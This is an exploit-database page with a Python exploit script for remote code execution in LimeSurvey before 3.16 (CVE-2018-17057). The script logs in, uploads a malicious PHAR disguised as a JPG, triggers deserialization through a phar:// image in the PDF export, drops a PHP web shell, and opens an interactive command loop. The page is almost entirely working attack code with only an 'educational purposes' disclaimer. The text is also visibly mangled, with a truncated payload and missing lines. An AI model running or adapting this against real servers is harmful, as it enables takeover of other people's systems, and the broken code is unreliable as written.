Limesurvey < 3.16 remote code execution Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2019-04-02 |
Type : webapps |
Platform : php
This exploit / vulnerability Limesurvey < 3.16 remote code execution is for educational purposes only and if it is used you will do on your own risk!
# Description: LimeSurvey < 3.16 use a old version of "TCPDF" library, this version is vulnerable to a Serialization Attack via the "phar://" wrapper.
# Date: 29/03/2019
# Exploit Title: Remote Code Execution in LimeSurvey < 3.16 via Serialization Attack in TCPDF.
# Exploit Author: @q3rv0
# Google Dork:
# Version: < 3.16
# Tested on: LimeSurvey 3.15
# PoC:
# CVE: CVE-2018-17057
# SecSignal is: <3
# Usage: python [URL] [USERNAME] [PASSWORD]
import requests
import sys
import re
SESSION = requests.Session()
# Malicious PHAR generated with PHPGGC.
# ./phpggc Yii/RCE1 system "echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | xxd -r -p > shell.php" -p phar -o /tmp/exploit.jpg
PHAR = ("\x3c\x3f\x70\x68\x70\x20\x5f\x5f\x48\x41\x4c\x54\x5f\x43\x4f\x4d\x50\x49\x4c\x45\x52\x28\x29\x3b\x20\x3f\x3e\x0d\x0a\x38"
def usage():
if len(sys.argv) != 4:
print "Usage: python [URL] [USERNAME] [PASSWORD]"
def get(url):
r = SESSION.get(url, verify=False)
return r.text
def post(url, data={}, files=None, headers=None):
r =, data=data, headers=headers, files=files, verify=False)
return r.text
def getYIICSRFToken(url):
res = get(url)
token = re.findall(r'value="(.*)" name="YII_CSRF_TOKEN"', res)
return token[0]
def getKCSRFToken(url):
res = get(url)
token = re.findall(r'csrftoken = "(.*)";', res)
return token[0]
def login(url, username, password):
token = getYIICSRFToken(url)
data = {"YII_CSRF_TOKEN" : token,
"authMethod" : "Authdb",
"user" : username,
"password" : password,
"loginlang" : "default",
"action" : "login",
"width" : "1366",
"login_submit" : "login"
res = post(url, data)
if len(re.findall("loginform", res)) == 0:
return True
return False
def emailTemplates(url):
return get(url)
def createSurvey(url_newsurvey, url_insert):
token = getYIICSRFToken(url_newsurvey)
data = {"YII_CSRF_TOKEN" : token,
"surveyls_title" : "Survey Example - SecSignal",
"language" : "en",
"createsample" : "0",
"description" : "foo",
"url" : "",
"urldescrip" : "",
"dateformat" : "1",
"numberformat_en": "0",
"welcome" : "bar",
"endtext" : "asdf",
"owner_id" : "1",
"admin" : "Administrator",
"adminemail" : "",
"bounce_email" : "",
"faxto" : "",
"gsid" : "1",
"format" : "G",
"template" : "fruity",
"navigationdelay": "0",
"questionindex" : "0",
"showgroupinfo" : "B",
"showqnumcode" : "X",
"shownoanswer" : "Y",
"showxquestions" : "0",
"showxquestions" : "1",
"showwelcome" : "0",
"showwelcome" : "1",
"allowprev" : "0",
"nokeyboard" : "0",
"showprogress" : "0",
"showprogress" : "1",
"printanswers" : "0",
"publicstatistics" : "0",
"publicgraphs" : "0",
"autoredirect" : "0",
"startdate" : "",
"expires" : "",
"listpublic" : "0",
"usecookie" : "0",
"usecaptcha_surveyaccess" : "0",
"usecaptcha_registration" : "0",
"usecaptcha_saveandload" : "0",
"datestamp" : "0",
"ipaddr" : "0",
"refurl" : "0",
"savetimings" : "0",
"assessments" : "0",
"allowsave" : "0",
"allowsave" : "1",
"emailnotificationto" : "",
"emailresponseto" : "",
"googleanalyticsapikeysetting" : "N",
"googleanalyticsstyle" : "0",
"tokenlength" : "15",
"anonymized" : "0",
"tokenanswerspersistence" : "0",
"alloweditaftercompletion" : "0",
"allowregister" : "0",
"htmlemail" : "0",
"htmlemail" : "1",
"sendconfirmation" : "0",
"sendconfirmation" : "1",
"saveandclose" : "1"
res = post(url_insert, data)
surveyid = re.findall(r'surveyid\\/([0-9]+)', res)
return surveyid[0] # Return SurveyiD
def uploadPHAR(url_upload, url_csrf_token, phar):
kcfinder_csrftoken = getKCSRFToken(url_csrf_token)
files = {'upload[]': ('malicious.jpg', phar)}
data = {"dir" : "files",
"kcfinder_csrftoken" : kcfinder_csrftoken
res = post(url_upload, data, files)
return res
def pdfExport(url_pdf_export, surveyid):
token = getYIICSRFToken(url_pdf_export + surveyid)
data = {"save_language" : "en",
"queXMLStyle" : '<h1>Stage 2</h1><img src="phar://./upload/surveys/'+ surveyid + '/files/malicious.jpg">',
"queXMLSingleResponseAreaHeight" : "9",
"queXMLSingleResponseHorizontalHeight" : "10.5",
"queXMLQuestionnaireInfoMargin" : "5",
"queXMLResponseTextFontSize" : "10",
"queXMLResponseLabelFontSize" : "7.5",
"queXMLResponseLabelFontSizeSmall" : "6.5",
"queXMLSectionHeight" : "18",
"queXMLBackgroundColourSection" : "221",
"queXMLBackgroundColourQuestion" : "241",
"queXMLAllowSplittingSingleChoiceHorizontal" : "0",
"queXMLAllowSplittingSingleChoiceHorizontal" : "1",
"queXMLAllowSplittingSingleChoiceVertical" : "0",
"queXMLAllowSplittingSingleChoiceVertical" : "1",
"queXMLAllowSplittingMatrixText" : "0",
"queXMLAllowSplittingMatrixText" : "1",
"queXMLAllowSplittingVas" : "0",
"queXMLPageOrientation" : "P",
"queXMLPageFormat" : "A4",
"queXMLEdgeDetectionFormat" : "lines",
"YII_CSRF_TOKEN" : token,
"ok" : "Y"}
res = post(url_pdf_export + surveyid, data)
return res
def shell(url):
r = requests.get("%s/shell.php" % url)
if r.status_code == 200:
print "[+] Pwned! :)"
print "[+] Getting the shell..."
while 1:
input = raw_input("$ ")
r = requests.get("%s/shell.php?c=%s" % (url, input))
print r.text
except KeyboardInterrupt:
sys.exit("\nBye kaker!")
print "[*] The site seems not to be vulnerable :("
def main():
url = sys.argv[1] # URL
username = sys.argv[2] # Username
password = sys.argv[3] # Password
url_login = "%s/index.php/admin/authentication/sa/login" % url
print "[*] Logging in to LimeSurvey..."
if login(url_login, username, password):
url_newsurvey = "%s/index.php/admin/survey/sa/newsurvey" % url
url_insert = "%s/index.php/admin/survey/sa/insert" % url
print "[*] Creating a new Survey..."
surveyid = createSurvey(url_newsurvey, url_insert)
print "[+] SurveyID: %s" % surveyid
email_templates = "%s/index.php/admin/emailtemplates/sa/index/surveyid/%s" % (url, surveyid)
url_csrf_token = "%s/third_party/kcfinder/browse.php?opener=custom&type=files&CKEditor=email_invitation_en&langCode=en" % url
url_upload = "%s/third_party/kcfinder/browse.php?type=files&lng=en&opener=custom&act=upload" % url
print "[*] Uploading a malicious PHAR..."
uploadPHAR(url_upload, url_csrf_token, PHAR)
url_pdf_export = "%s/index.php/admin/export/sa/quexml/surveyid/" % url
print "[*] Sending the Payload..."
export_response = pdfExport(url_pdf_export, surveyid)
print "[*] TCPDF Response: %s" % export_response
print "[-] Bad credentials :("
if __name__ == "__main__":